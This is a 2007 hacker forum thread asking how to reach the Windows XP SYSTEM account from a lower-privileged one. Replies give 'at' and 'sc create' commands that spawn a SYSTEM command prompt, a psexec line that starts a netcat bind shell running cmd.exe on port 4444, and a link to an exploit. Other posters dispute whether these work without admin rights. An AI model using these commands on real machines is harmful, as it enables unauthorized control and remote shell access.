Jump to content


Photo
- - - - -

Windows System User


  • Please log in to reply
17 replies to this topic

#1 wethcr

wethcr

    DDP Fan club member

  • Members
  • 51 posts

Posted 13 April 2007 - 05:38 PM

When was it found out that you cold log onto the Windows XP System account from a limited account? Yes u have full control of the computer and domain if your on 1
Just wondering cuz its a nice little thing to Know and just curious as to how long after XP was released it was found.

Is this even a well known issue of XP?

Edited by wethcr, 13 April 2007 - 05:41 PM.


#2 thej3w

thej3w

    T0tal n00b

  • Members
  • 0 posts
  • Location:Chicago

Posted 13 April 2007 - 07:19 PM

Depends on what you are talking about logging into the SYSTEM account. If you're talking about, I know the one I use works in 2000,XP,2003, and Vista.

#3 xantr3x

xantr3x

    SUP3R 31337 P1MP

  • Members
  • 280 posts

Posted 13 April 2007 - 08:55 PM

Use the command [codebox]at (insert time + 1 minute here) /interactive cmd.exe[/codebox]
A new Command Prompt will open, and next open up the Task Manager. End Explorer.exe and start it again in the new Command Prompt by typing explorer.exe. The desktop will refresh, and voila, you are superuser. just logoff and log on again to go back. In superuser you can control everything.

#4 intimidat0r

intimidat0r

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 455 posts

Posted 13 April 2007 - 11:56 PM

Except limited users cannot run 'at'.

#5 xantr3x

xantr3x

    SUP3R 31337 P1MP

  • Members
  • 280 posts

Posted 14 April 2007 - 12:07 AM

Yeah, general users can, limited/restricted can't.

#6 operat0r

operat0r

    Dangerous free thinker

  • Members
  • 793 posts
  • Location:ops

Posted 14 April 2007 - 12:27 AM

sc delete killall
sc create killall binpath= "cmd /K start c:\cax /killuser "%username%" type= own type= interact
sc start killall


sc runs as system..

#7 Alk3

Alk3

    "I Hack, therefore, I am"

  • Binrev Financier
  • 1,003 posts
  • Gender:Not Telling
  • Location:312 Chi-town

Posted 14 April 2007 - 12:33 AM

We were messing with this today on our school network (with permission). We get our own hard drives for our labs and we can put/do whatever we want to these HDs. The 'at' command can be run as users with greater than a regular user account in. The guest account cant do this on Vista or WinXP's, but in earlier versions of Windoze you can do A LOT more than you think with the Guest account. So for those with Windows ME/2000/2003 try it out in the guest account, it works in most cases. But operator posted the best option. :)

#8 wethcr

wethcr

    DDP Fan club member

  • Members
  • 51 posts

Posted 14 April 2007 - 12:02 PM

Thanks for the info every1. Could someone elaborate on operators post with the SC please seems like something that would be good to know

Thanks
Wethcr

#9 Alk3

Alk3

    "I Hack, therefore, I am"

  • Binrev Financier
  • 1,003 posts
  • Gender:Not Telling
  • Location:312 Chi-town

Posted 14 April 2007 - 05:41 PM

http://support.microsoft.com/kb/251192

#10 Dirk Chestnut

Dirk Chestnut

    SUP3R 31337 P1MP

  • Members
  • 268 posts
  • Location:248

Posted 14 April 2007 - 11:08 PM

This is a cool trick and all... but how do you run AT with any account that isn't a member of the local Administrators group?

From http://www.microsoft...s.mspx?mfr=true :

Using at

To use at, you must be a member of the local Administrators group.


Every so many months, these boards get random postings consisting of "You can escalate Windows priviledges using AT," and some posters even claim this can be done with a regular user.

I assure you this is NOT the case, in a normally configured system. While you can escalate administrator-level priviledges to the SYSTEM account, you can't do this with a regular user. Just because you're not logged in as "Administrator" doesn't mean you're not an administrator of the system. I think a lot of you are getting confused, and thinking that just because your user account isn't named "Administrator," that it must not be an administrator, and thus that this trick can be performed with a generic user account.

Try AT out sometime, with an account you are positive is only a member of the regular "Users" group. You will be pleasently disapointed.

Edited by Dirk Chestnut, 14 April 2007 - 11:36 PM.


#11 wethcr

wethcr

    DDP Fan club member

  • Members
  • 51 posts

Posted 15 April 2007 - 12:06 AM

You don't hafta be in the admin group to run at.... We do this at school all the time with our plain old student account. And i kno that isnt admin cuz we cant even install anything.

#12 Alk3

Alk3

    "I Hack, therefore, I am"

  • Binrev Financier
  • 1,003 posts
  • Gender:Not Telling
  • Location:312 Chi-town

Posted 15 April 2007 - 07:19 PM

it may just be a poorly configured account > a regular user account in the user's group. The account could also be an account created for students, and net set to a default user. The person who set it up may just have forgotten about 'at'.

#13 Anon-De-Anonymous

Anon-De-Anonymous

    DDP Fan club member

  • Members
  • 56 posts
  • Location:India

Posted 16 April 2007 - 11:47 AM

psexec can do wonders too!!

Suppose you run nc.exe located at c:\windows\system32
psexec -d -s c:\windows\system32\nc.exe -L -p 4444 -d -e cmd.exe
this will run netcat unser the system account and psexec will exit after the execution!!

better use old versions of psexec which came with backtrack1 the newer one shows an agreement (cannot be run on a remote machines as it pulls up GUI!!)

Edited by Anon-De-Anonymous, 16 April 2007 - 11:49 AM.


#14 Hartley

Hartley

    H4x0r

  • Members
  • 33 posts

Posted 17 April 2007 - 02:04 AM

sc create hak binpath= "cmd /K start" type= own type= interact

works well good. :ranaway:

#15 Anon-De-Anonymous

Anon-De-Anonymous

    DDP Fan club member

  • Members
  • 56 posts
  • Location:India

Posted 17 April 2007 - 12:27 PM

sc create hak binpath= "cmd /K start" type= own type= interact

works well good. :ranaway:


that works with Admin priviledges only and not as a User

#16 Hartley

Hartley

    H4x0r

  • Members
  • 33 posts

Posted 18 April 2007 - 08:26 AM

could use this way http://www.hak5.org/...strator_Control

#17 Anon-De-Anonymous

Anon-De-Anonymous

    DDP Fan club member

  • Members
  • 56 posts
  • Location:India

Posted 18 April 2007 - 12:16 PM

could use this way http://www.hak5.org/...strator_Control


Yeah Thats must work!! Thx

#18 Hartley

Hartley

    H4x0r

  • Members
  • 33 posts

Posted 18 April 2007 - 03:11 PM

The best way would be to use a real exploit like this one http://www.milw0rm.com/exploits/3755 I have never taken any time to understand them though so never used one.




BinRev is hosted by the great people at Lunarpages!